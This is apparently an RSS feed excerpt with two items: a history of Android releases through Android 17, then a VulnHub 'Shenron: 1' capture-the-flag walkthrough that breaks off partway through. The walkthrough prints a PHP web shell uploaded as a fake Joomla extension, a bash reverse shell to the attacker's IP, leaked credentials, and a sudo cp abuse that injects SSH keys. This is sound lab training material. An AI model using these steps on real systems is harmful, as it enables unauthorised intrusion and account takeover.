<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The ICS home screen and app-switching interface.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Android 4.0 also made swiping a more integral method of getting around the operating system, with the then-revolutionary-feeling ability to swipe away things like notifications and recent apps. And it started the slow process of bringing a standardized design framework — <a href="https://android-developers.googleblog.com/2012/01/holo-everywhere.html" rel="noopener nofollow" target="_blank">known as “Holo”</a> — all throughout the OS and into Android’s app ecosystem.</p>



<h2 class="wp-block-heading">Android versions 4.1 to 4.3: Jelly Bean</h2>



<p>Spread across three impactful Android versions, 2012 and 2013’s <a href="https://www.computerworld.com/article/1486663/android-4-1-jelly-bean-the-complete-faq.html">Jelly Bean</a> releases took ICS’s fresh foundation and made meaningful strides in fine-tuning and building upon it. The releases added <a href="https://www.computerworld.com/article/1488285/android-4-2-the-poise-and-the-polish.html">plenty of poise and polish</a> into the operating system and went a long way in making Android more inviting for the average user.</p>



<p>Visuals aside, Jelly Bean brought about our first taste of <a href="https://www.computerworld.com/article/1487695/google-now-revisited-one-month-with-android-s-new-secret-weapon.html">Google Now</a> — the spectacular predictive-intelligence utility that’s sadly since <a href="https://www.computerworld.com/article/1713354/google-feed.html">devolved into a glorified news feed</a>. It gave us expandable and interactive notifications, an expanded voice search system, and a more advanced system for displaying search results in general, with a focus on card-based results that attempted to answer questions directly.</p>



<p>Multiuser support also came into play, albeit on tablets only at this point, and an early version of Android’s Quick Settings panel made its first appearance. Jelly Bean ushered in a heavily hyped system for <a href="https://www.computerworld.com/article/1487969/android-4-2-lock-screen-widgets-hands-on-impressions-and-gallery.html">placing widgets on your lock screen</a>, too — one that, like <a href="https://www.computerworld.com/article/1675915/google-android-chrome-os-flip-flops.html">so many Android features over the years</a>, quietly disappeared a couple years later.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Jelly Bean’s Quick Settings panel and short-lived lock screen widget feature.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 4.4: KitKat</h2>



<p>Late-2013’s <a href="https://www.computerworld.com/article/1488220/android-4-4-kitkat-the-complete-faq.html">KitKat</a> release marked the end of Android’s dark era, as the blacks of Gingerbread and the blues of Honeycomb finally made their way out of the operating system. Lighter backgrounds and more neutral highlights took their places, with a transparent status bar and white icons giving the OS a more contemporary appearance.</p>



<p>Android 4.4 also saw the first version of “OK, Google” support — but in KitKat, the hands-free activation prompt worked only when your screen was already on <em>and</em> you were either at your home screen or inside the Google app.</p>



<p>The release was Google’s first foray into claiming a full panel of the home screen for its services, too — at least, for users of its own Nexus phones and those who chose to download its first-ever standalone launcher.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>The lightened KitKat home screen and its dedicated Google Now panel.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android versions 5.0 and 5.1: Lollipop</h2>



<p>Google essentially reinvented Android — again — with its <a href="https://www.computerworld.com/article/1605043/android-50-lollipop-faq.html">Android 5.0 Lollipop release</a> in the fall of 2014. Lollipop launched the still-present-today <a href="https://www.computerworld.com/article/1618144/material-design-1-year-later-pocket-pocketcasts.html">Material Design standard</a>, which brought a whole new look that extended across all of Android, its apps and even other Google products.</p>



<p>The card-based concept that had been scattered throughout Android became a core UI pattern — one that would guide the appearance of everything from notifications, which now showed up on the lock screen for at-a-glance access, to the Recent Apps list, which took on an unabashedly card-based appearance.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Lollipop and the onset of Material Design.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Lollipop introduced a slew of new features into Android, including truly hands-free voice control via the “OK, Google” command, support for multiple users on phones and a priority mode for better notification management. It changed so much, unfortunately, that it also introduced <a href="https://www.computerworld.com/article/1617255/broken-lollipop-android-50.html">a bunch of troubling bugs</a>, many of which wouldn’t be fully ironed out until the following year’s 5.1 release.</p>



<h2 class="wp-block-heading">Android version 6.0: Marshmallow</h2>



<p>In the grand scheme of things, 2015’s <a href="https://www.computerworld.com/article/1648529/android-60-marshmallow-faq.html">Marshmallow</a> was a fairly minor Android release — one that seemed <a href="https://www.computerworld.com/article/1640270/android-60-marshmallow.html">more like a 0.1-level update</a> than anything deserving of a full number bump. But it started the trend of Google releasing one major Android version per year and that version always receiving its own whole number.</p>



<p>Marshmallow’s most attention-grabbing element was a screen-search feature called Now On Tap — something that, <a href="https://www.computerworld.com/article/1647791/android-60-google-now-on-tap.html">as I said at the time</a>, had tons of potential that wasn’t fully tapped. Google never quite perfected the system and ended up quietly retiring its brand and moving it out of the forefront the following year.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Marshmallow and the almost-brilliance of Google Now on Tap.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Android 6.0 did introduce some stuff with lasting impact, though, including more granular app permissions, support for fingerprint readers, and support for USB-C.</p>



<h2 class="wp-block-heading">Android versions 7.0 and 7.1: Nougat</h2>



<p>Google’s 2016 <a href="https://www.computerworld.com/article/1676923/android-70-nougat-faq.html">Android Nougat</a> releases provided Android with a native split-screen mode, a new bundled-by-app system for organizing notifications, and a Data Saver feature. Nougat added some <a href="https://www.computerworld.com/article/1659731/android-n-features.html">smaller but still significant features</a>, too, like <a href="https://www.computerworld.com/article/1713251/time-saving-android-shortcuts.html">an Alt-Tab-like shortcut</a> for snapping between apps.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Android 7.0 Nougat and its new native split-screen mode.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Perhaps most pivotal among Nougat’s enhancements, however, was the launch of the <a href="https://www.computerworld.com/article/1672409/google-assistant-clarity-consistency.html">Google Assistant</a> — which came alongside the announcement of <a href="https://www.computerworld.com/article/1667955/google-pixel-phone.html">Google’s first fully self-made phone</a>, the Pixel, about two months after Nougat’s debut. The Assistant would go on to become a critical component of Android and most other Google products and is arguably the company’s <a href="https://www.computerworld.com/article/1713866/google-ecosystem.html">foremost effort today</a>.</p>



<h2 class="wp-block-heading">Android version 8.0 and 8.1: Oreo</h2>



<p><span lang="EN"><a href="https://www.computerworld.com/article/1712082/android-80-oreo.html">Android Oreo</a> added a variety of niceties to the platform, including a native picture-in-picture mode, a <a href="https://www.computerworld.com/article/1668192/android-o-notifications.html">notification snoozing</a> option, and notification channels that offer fine control over how apps can alert you.</span></p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> loading="lazy" width="400px"&gt;<figcaption class="wp-element-caption"><p>Oreo adds several significant features to the operating system, including a new picture-in-picture mode.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>The 2017 release also included some noteworthy elements that furthered <a href="https://www.computerworld.com/article/1711690/android-chrome-os-alignment.html">Google’s goal of aligning Android and Chrome OS</a> and improving the experience of using <a href="https://www.computerworld.com/article/1713962/android-apps-for-chromebooks-the-essentials.html">Android apps on Chromebooks</a>, and it was the first Android version to feature <a href="https://www.computerworld.com/article/1680570/google-android-upgrades-project-treble.html">Project Treble</a> — an ambitious effort to create a modular base for Android’s code with the hope of making it easier for device-makers to provide timely software updates.</p>



<h2 class="wp-block-heading">Android version 9: Pie</h2>



<p>The freshly baked scent of <a href="https://www.computerworld.com/article/1716905/android-pie-30-advanced-tips-and-tricks.html">Android Pie</a>, a.k.a. Android 9, wafted into the Android ecosystem in August of 2018. Pie’s most transformative change was its <a href="https://www.computerworld.com/article/1689846/android-p-gesture-navigation.html">hybrid gesture/button navigation system</a>, which traded Android’s traditional Back, Home, and Overview keys for a large, multifunctional Home button and a small Back button that appeared alongside it as needed.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2018/08/android-versions-pie-100766995-orig.jpg?quality=50&amp;strip=all" alt="android versions pie" class="wp-image-71344" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 9 introduced a new gesture-driven system for getting around phones, with an elongated Home button and a small Back button that appears as needed.</p></figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Pie included some <a href="https://www.computerworld.com/article/1690077/android-p-features.html">noteworthy productivity features</a>, too, such as a universal suggested-reply system for messaging notifications, a new dashboard of <a href="https://www.computerworld.com/article/1698598/android-9-pie.html">Digital Wellbeing controls</a>, and more intelligent systems for power and screen brightness management. And, of course, there was no shortage of <a href="https://www.computerworld.com/article/1697656/android-p-additions.html">smaller but still-significant advancements</a> hidden throughout Pie’s filling, including a smarter way to handle Wi-Fi hotspots, a welcome twist to Android’s Battery Saver mode, and a variety of <a href="https://www.computerworld.com/article/1717445/android-p-security.html">privacy and security enhancements</a>.</p>



<h2 class="wp-block-heading">Android version 10</h2>



<p>Google released Android 10 — the first Android version to <a href="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html" title="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html">shed its letter</a> and be known simply by a number, with no dessert-themed moniker attached — in September of 2019. Most noticeably, the software brought about a <a href="https://www.computerworld.com/article/1670334/android-q-gestures-problems.html" title="https://www.computerworld.com/article/1670334/android-q-gestures-problems.html">totally reimagined interface</a> for Android gestures, this time doing away with the tappable Back button altogether and relying on a completely swipe-driven approach to system navigation.</p>



<p>Android 10 packed plenty of other <a title="https://www.computerworld.com/article/1720172/android-q.html" href="https://www.computerworld.com/article/1720172/android-q.html">quietly important improvements</a>, including an <a title="https://www.computerworld.com/article/1658269/android-10-privacy.html" href="https://www.computerworld.com/article/1658269/android-10-privacy.html">updated permissions system</a> with more granular control over location data along with a new system-wide dark theme, a new distraction-limiting Focus Mode, and a new on-demand live captioning system for any actively playing media.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2019/09/android-versions-10-privacy-100810521-orig.jpg?quality=50&amp;strip=all" alt="android versions 10 privacy" class="wp-image-99668" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 10’s new privacy permissions model adds some much-needed nuance into the realm of location data.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 11</h2>



<p><a href="https://www.computerworld.com/article/1645546/18-advanced-tips-for-android-11.html">Android 11</a>, launched at the start of September 2020, was a pretty substantial Android update both under the hood and on the surface. The version’s most significant changes <a href="https://www.computerworld.com/article/1629241/android-11-additions.html">revolve around privacy</a>: The update built upon the expanded permissions system introduced in Android 10 and added in the option to grant apps location, camera, and microphone permissions only on a limited, single-use basis.</p>



<p>Android 11 also made it more difficult for apps to request the ability to detect your location in the background, and it introduced a feature that automatically revokes permissions from any apps you haven’t opened lately. On the interface level, Android 11 included a refined approach to conversation-related notifications along with a new streamlined media player, a new Notification History section, a native screen-recording feature, and a system-level menu of connected-device controls.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2020/09/android-versions-android-11-media-player-connected-controls-100857067-orig.jpg?quality=50&amp;strip=all" alt="android versions android 11 media player connected controls" class="wp-image-136995" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 11’s new media player appears as part of the system Quick Settings panel, while the new connected-device control screen comes up whenever you press and hold your phone’s physical power button.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 12</h2>



<p>Google officially launched the final version of Android 12 in October 2021, alongside the launch of its <a href="https://www.computerworld.com/article/1615815/pixel-6-vs-pixel-6-pro.html">Pixel 6 and Pixel 6 Pro phones</a>.</p>



<p>In a twist from the previous several Android versions, the most significant progressions with Android 12 were mostly on the surface. Android 12 featured the biggest reimagining of Android’s interface since 2014’s Android 5.0 (Lollipop) version, with an updated design standard known as Material You — which revolves around the idea of <em>you</em> customizing the appearance of your device with dynamically generated themes based on your current wallpaper colors. Those themes automatically change anytime your wallpaper changes, and they extend throughout the entire operating system interface and even into the interfaces of apps that support the standard.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2021/05/android-versions-android-12-material-you-100889678-orig.jpg?quality=50&amp;strip=all" alt="android versions android 12 material you" class="wp-image-163730" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 12 ushered in a whole new look and feel for the operating system, with an emphasis on simple color customization.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Surface-level elements aside, Android 12 brought a (<a href="https://www.computerworld.com/article/1639159/android-missed-opportunity.html">long overdue</a>) renewed focus to Android’s widget system along with a host of important foundational enhancements in the areas of performance, security, and privacy. The update provided more powerful and accessible controls over how different apps are using your data and how much information you allow apps to access, for instance, and it included a new isolated section of the operating system that allows AI features to operate entirely on a device, without any potential for network access or data exposure.</p>



<h2 class="wp-block-heading">Android version 13</h2>



<p>Android 13, launched in August 2022, was simultaneously one of the most ambitious updates in Android history <em>and </em>one of the most subtle version changes to date.</p>



<p>On tablets and foldable phones, Android 13 introduced a slew of significant interface updates and additions aimed at improving the large-screen Android experience — including an enhanced split-screen mode for multitasking and a <a href="https://www.computerworld.com/article/1619037/android-chrome-os-intersection.html">ChromeOS-like taskbar</a> for easy app access from anywhere.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2022/04/android-13-multitasking-100925567-orig.gif" alt="Android 13 Multitasking" class="wp-image-493989" loading="lazy" width="400px"><figcaption class="wp-element-caption">The new Android-13-introduced taskbar, as seen on a Google Pixel Fold phone.</figcaption></figure><p class="imageCredit">Google</p></div>



<p>On regular phones, Android 13 brought about far less noticeable changes — mostly just some enhancements to the system clipboard interface, a new native QR code scanning function within the Android Quick Settings area, and a smattering of under-the-hood improvements.</p>



<h2 class="wp-block-heading">Android version 14</h2>



<p>Following a full eight months of out-in-the-open refinement, Google’s 14th Android version landed at the start of October 2023, in the midst of the company’s <a href="https://www.computerworld.com/article/1636686/google-pixel-8-android.html">Pixel 8 and Pixel 8 Pro</a> launch event.</p>



<p>Like the version before it, Android 14 <a href="https://www.computerworld.com/article/1623187/google-android-14-boring.html">didn’t look like much on the surface</a>. That’s in part because of the trend of Google moving more and more toward a development cycle that revolves around smaller <a href="https://www.computerworld.com/article/1623187/google-android-14-boring.html">ongoing updates to individual system-level elements year-round</a> — something that’s actually <a href="https://www.computerworld.com/article/1615334/android-upgrade-advantage.html">a significant advantage for Android users</a>, even if it does have an awkward effect on people’s perception of progress.</p>



<p>But despite the subtle nature of its first impression, Android 14 delivered <a href="https://www.computerworld.com/article/1637026/google-pixel-android-14.html">a fair amount of noteworthy new goodies</a>. The software introduced a new system for dragging and dropping text between apps, for instance, as well as a number of new improvements to privacy and security — including a new settings-integrated dashboard for managing health and fitness data and a more info-rich and context-requiring system for seeing exactly <em>why </em>apps want access to your location. And it brought about a new set of native customization options for the Android lock screen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://legacy-us-images.foundryco.app/images/article/2023/10/android-versions-android-14-lock-screen-100947103-orig.jpg?quality=50&amp;strip=all" alt="android versions android 14 lock screen" class="wp-image-662008" loading="lazy" width="400px"><figcaption class="wp-element-caption"><p>Android 14 includes options for completely changing the appearance of the lock screen as well as for customizing which shortcuts show up on it.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<h2 class="wp-block-heading">Android version 15</h2>



<p>Though Android 15 followed the trend of significant advancements arriving as their own separate rollouts — <a href="https://www.computerworld.com/article/2088279/google-circle-to-search-google-android.html">outside of</a> and even <a href="https://www.computerworld.com/article/3550499/google-android-security-enhancements.html">ahead of</a> <em>its </em>arrival, as an official operating system update — 2024’s new Android version was certainly no slouch.</p>



<p>The software introduced <a href="https://www.computerworld.com/article/3564973/android-15-features-google-pixel-phone.html">a number of noteworthy new features</a> — including a redesigned system volume panel, an option to automatically re-enable a device’s Bluetooth radio a day after it’s been disabled, and a Pixel-specific Adaptive Vibration feature that intelligently adjusts a phone’s vibration intensity based on the environment. It also marked the debut of a system-level Private Space area that lets you keep sensitive apps out of sight and accessible only with authentication.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/10/android-version-15-private-space.jpg?quality=50&amp;strip=all&amp;w=1024" alt="android 15 private space feature" class="wp-image-3570907" width="1024" height="1024" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Once you set up Android 15’s new Private Space feature, certain apps appear in a special protected — and optionally hidden — area of your app drawer.</p>
</figcaption></figure><p class="imageCredit">JR Raphael / IDG</p></div>



<p>Add in handy touches like a space-saving app archiving option and a predictive back visual that lets you sneak a peek at where you’re headed before you get there, and this small-seeming update shaped up to be a pretty hefty progression.</p>



<h2 class="wp-block-heading">Android version 16</h2>



<p>In a marked change from recent Android upgrade cycles, Google decided to go with <a href="https://www.computerworld.com/article/3803217/android-upgrades-2025.html"><em>two</em></a><a href="https://www.computerworld.com/article/3803217/android-upgrades-2025.html"> new Android versions per year</a> as of 2025 — starting with Android 16 in the spring and then following that with a smaller release in the fall.</p>



<p>True to that promise, Android 16 catapulted into the world in early June, creating the framework for future-facing systems such as <a href="https://blog.google/products/android/android-16/#:~:text=Streamlined%20and%20up-to-date%20notifications" target="_blank" rel="noreferrer noopener">Live Updates</a> — a new type of notification designed to support persistent, ongoing alerts, similar to what Apple does with iOS’s Live Activities — and introducing <a href="https://www.computerworld.com/article/4004401/android-16-advanced-protection-security.html">an Advanced Protection security supermode</a> that provides a simple single-switch way to activate a whole slew of advisable <a href="https://www.computerworld.com/article/1718177/android-settings-security.html">Android security settings</a> in one fell swoop.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/google-android-16-android-protection-security.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Google Android 16 Advanced Protection security" class="wp-image-4004452" width="1024" height="833" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The Android 16 Advanced Security control panel, as seen on a Google Pixel phone.</p></figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>The update included a sprawling series of <a href="https://www.computerworld.com/article/3984225/android-reinvention-ai.html#:~:text=A%20new%20Advanced,system%20security%20settings">other new security strengtheners</a>, too, making protection seem like the true centerpiece of Android 16 — even if other touches, such as a more advanced standard for hearing aid support, helped flesh out the software into a rounded and feature-rich release.</p>



<h2 class="wp-block-heading">Android version 17</h2>



<p>With its <a href="https://blog.google/products-and-platforms/platforms/android/android-17-features" target="_blank" rel="noreferrer noopener">relatively low-key arrival</a> in June 2026, Android 17 officially brings the <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%231%3A%20Bubbles%20multitasking%20magic">long under-development Bubbles multitasking system</a> to the Android-owning masses — adding an interesting new way to keep any app available on demand in a floating, collapsible window for easy ongoing access.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-bubbles_cb5ebb.gif" alt="animated screenshot of pressing bubble to switch between apps" class="wp-image-4186299" width="800" height="817" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption"><p>Android 17’s Bubbles offers a whole new way to think about multitasking.</p>
</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Speaking of bubbliness, Android 17 also includes the creator-aimed option of showing a cutout of your face from a front-facing camera over an active screen recording — because why not, right? — along with such practical touches as <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%233%3A%20More%20dynamic%20dark%20mode">a more dynamic and consistent system-wide dark mode</a> and a <a href="https://www.computerworld.com/article/4185786/google-pixel-android-17.html#:~:text=Android%2017%20Pixel%20feature%20%232%3A%20Smarter%20location%20access">more nuanced and effective way to track and control app location access</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-location-indicator.png?w=1024" alt="Android 17 Location Indicator screens with manage access button" class="wp-image-4185803" width="1024" height="847" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Managing app location access is extra easy <em>and</em> powerful in Android 17.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>While those features and the inevitable slew of under-the-hood security, performance, and privacy improvements add up to form a compelling final picture, it’s hard not to notice that much of Google’s focus in this era is now on the AI layers <em>surrounding</em> Android as opposed to being on Android itself, as an operating system. The company’s I/O conference in May showcased <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/" target="_blank" rel="noreferrer noopener">many such measures</a>, appropriately noting that Android was transitioning from being “an operating system” into being “an intelligence system” (whatever that means).</p>



<p>Most of those “intelligence system” items remain limited in ability or not yet available as of the time of Android 17’s release — like <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/#:~:text=Turn%20spoken%20thoughts%20into%20polished%20text" target="_blank" rel="noreferrer noopener">the new and improved speech-to-text system for Gboard</a>, the <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/#:~:text=Build%20custom%20widgets" target="_blank" rel="noreferrer noopener">custom-widget-creating system for Android phones</a>, and the <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/#:~:text=Automate%20multi-step%20tasks%20across%20your%20apps" target="_blank" rel="noreferrer noopener">multistep automation system for allowing AI to complete complex tasks on your behalf</a> (assuming that you (a) <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html">trust such a system</a> to act on your behalf and (b) don’t find the level of access and resulting manner of assumptions it makes about your life <a href="https://www.computerworld.com/article/4182583/ai-creepy-era.html">to be overly creepy</a>).</p>



<p>But even at its foundational level and without any <a href="https://blog.google/products-and-platforms/platforms/android/android-halo/" target="_blank" rel="noreferrer noopener">AI-laden Halo effect</a> included, Android 17 manages to hold its own — with Bubbles acting as an anchor and bringing some much-appreciated new productivity potential our way.</p>



<p><em>This article was originally published in November 2017 and most recently updated in June 2026.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[VulnHub — Shenron: 1 | Full Walkthrough]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsPlatform: VulnHub Machine: Shenron: 1 by Shubham Mandloi Difficulty: Easy/Medium OS: Ubuntu 20.04.1 LTSOverviewShenron: 1 is a beginner-to-intermediate VulnHub machine built around a misconfigured Joomla CM...]]></description>
<link>https://tsecurity.de/de/3606857/hacking/vulnhub-shenron-1-full-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606857/hacking/vulnhub-shenron-1-full-walkthrough/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:21 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*L3xo_CwYbI7SdkdEV7rwJQ.png"></figure><p><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/shikhali-jamalzade">linkedin.com/in/</a>camalzads<br><strong>Platform:</strong> VulnHub <br><strong>Machine:</strong> <a href="https://www.vulnhub.com/entry/shenron-1,630/">Shenron: 1</a> by Shubham Mandloi <br><strong>Difficulty:</strong> Easy/Medium <strong>OS:</strong> Ubuntu 20.04.1 LTS</p><h3>Overview</h3><p>Shenron: 1 is a beginner-to-intermediate VulnHub machine built around a misconfigured Joomla CMS deployment. The attack path begins with credentials carelessly left in an HTML comment, escalates through a malicious extension upload for Remote Code Execution, and culminates in full root access via three distinct privilege escalation vectors. This machine is an excellent practical exercise covering real-world misconfigurations seen in production environments.</p><p><strong>Flags captured:</strong></p><ul><li>local.txt → 098bf43cc909e1f89bb4c910bd31e1d4</li><li>root.txt → aa087b2d466cd593622798c8e972bffb</li></ul><h3>Reconnaissance</h3><h3>Network Scan</h3><p>I began with a thorough Nmap scan to enumerate open ports, running services, and OS details:</p><pre>nmap -sC -sV -oN nmap/shenron.txt 192.168.100.210</pre><p><strong>Results:</strong></p><pre>PORT   STATE SERVICE VERSION<br>22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1<br>80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))</pre><p><strong>Key observations:</strong></p><ul><li>Only two ports exposed: SSH (22) and HTTP (80)</li><li>OS fingerprinted as <strong>Ubuntu 20.04.1 LTS (Focal Fossa)</strong></li><li>MAC: 08:00:27:F4:52:F8 → Oracle VirtualBox NIC</li><li>Apache 2.4.41 — an outdated version</li></ul><p>The minimal attack surface here pushes us straight to web enumeration.</p><h3>Web Enumeration</h3><h3>Directory Brute-Force with Dirb</h3><pre>dirb http://192.168.100.210 /usr/share/wordlists/dirb/common.txt</pre><p><strong>Discovered paths:</strong></p><pre>+ http://192.168.100.210/joomla/              [200]<br>+ http://192.168.100.210/joomla/administrator [200]<br>+ http://192.168.100.210/test/               [301]<br>+ http://192.168.100.210/server-status       [403]</pre><p>Two immediately interesting paths emerged:</p><ul><li>/joomla/ — A Joomla CMS installation</li><li>/test/ — A suspicious, unlisted directory</li></ul><h3>Investigating /test/</h3><p>Browsing to http://192.168.100.210/test/ revealed a directory listing. Inside was a file named password. On opening it, the page source contained the following HTML comment:</p><pre>&lt;!-- admin:3iqtzi4RhkWANcu@$pa$$ --&gt;</pre><p>A plaintext admin credential sitting in an HTML comment — a classic and critically dangerous developer mistake.</p><h3>Initial Access</h3><h3>F-01 — Credentials Hardcoded in HTML Comment</h3><p>Detail Value URL http://192.168.100.210/test/password Credentials admin : 3iqtzi4RhkWANcu@$pa$$ Severity <strong>Critical</strong></p><p>With these credentials, I navigated to the Joomla administrator panel:</p><pre>http://192.168.100.210/joomla/administrator/</pre><p>Login succeeded. We now had full administrative control over the Joomla CMS — this is the starting point for everything that follows.</p><h3>Foothold</h3><h3>F-03 — Remote Code Execution via Malicious Joomla Extension</h3><p>Joomla’s admin panel allows uploading extension packages (.zip files). I crafted a malicious PHP web shell disguised as a Joomla extension.</p><p><strong>Web shell payload (</strong><strong>shell.php):</strong></p><pre>&lt;?php system($_GET['cmd']); ?&gt;</pre><p>Packaged this into a .zip file structured as a valid Joomla extension and uploaded it via:</p><pre>Extensions → Install → Upload Package File</pre><p>The shell was deployed to:</p><pre>http://192.168.100.210/joomla/shell/shell.php</pre><p><strong>Verification:</strong></p><pre>http://192.168.100.210/joomla/shell/shell.php?cmd=id</pre><p>Response: uid=33(www-data) gid=33(www-data) groups=33(www-data) ✓</p><h3>Upgrading to a Reverse Shell</h3><p>Set up a Netcat listener on Kali:</p><pre>nc -lvnp 4444</pre><p>Triggered a bash reverse shell from the web shell:</p><pre>?cmd=bash -c 'bash -i &gt;%26 /dev/tcp/192.168.100.130/4444 0&gt;%261'</pre><p>Shell received:</p><pre>Connection received on 192.168.100.210 50792<br>www-data@shenron:/var/www/html/joomla/shell$</pre><p>Stabilised the shell for full interactivity:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'<br># Ctrl+Z<br>stty raw -echo; fg<br>export TERM=xterm</pre><p>We now had a stable shell as www-data.</p><h3>Privilege Escalation: www-data → jenny</h3><h3>F-04 — Database Credentials in configuration.php</h3><p>With filesystem access as www-data, I read the Joomla configuration file:</p><pre>cat /var/www/html/joomla/configuration.php</pre><pre>class JConfig {<br>    public $dbtype  = 'mysqli';<br>    public $host    = 'localhost';<br>    public $user    = 'jenny';<br>    public $password = 'Mypa$$wordi$notharD@123';<br>    public $db      = 'joomla_db';<br>}</pre><p>Credentials in plaintext. The database user jenny — could this be a system user too?</p><h3>F-05 — Password Reuse</h3><pre>su jenny<br>Password: Mypa$$wordi$notharD@123</pre><p>It worked. The database password was identical to the OS account password. This is a textbook password reuse vulnerability.</p><pre>whoami<br># jenny</pre><h3>Privilege Escalation: jenny → shenron</h3><h3>F-06 — Sudo Misconfiguration: cp (NOPASSWD)</h3><pre>sudo -l</pre><pre>User jenny may run the following commands on shenron:<br>    (shenron) NOPASSWD: /usr/bin/cp</pre><p>The cp binary can be run as user shenron without a password. This is exploitable via <strong>SSH authorized key injection</strong>.</p><p><strong>Exploit steps:</strong></p><ol><li>Generate an SSH keypair on the attacker machine (Kali):</li></ol><pre>ssh-keygen -t rsa -f /tmp/hacked_key</pre><ol><li>On the target, create a temporary file with the public key content:</li></ol><pre>echo "ssh-rsa AAAA...your_pub_key... 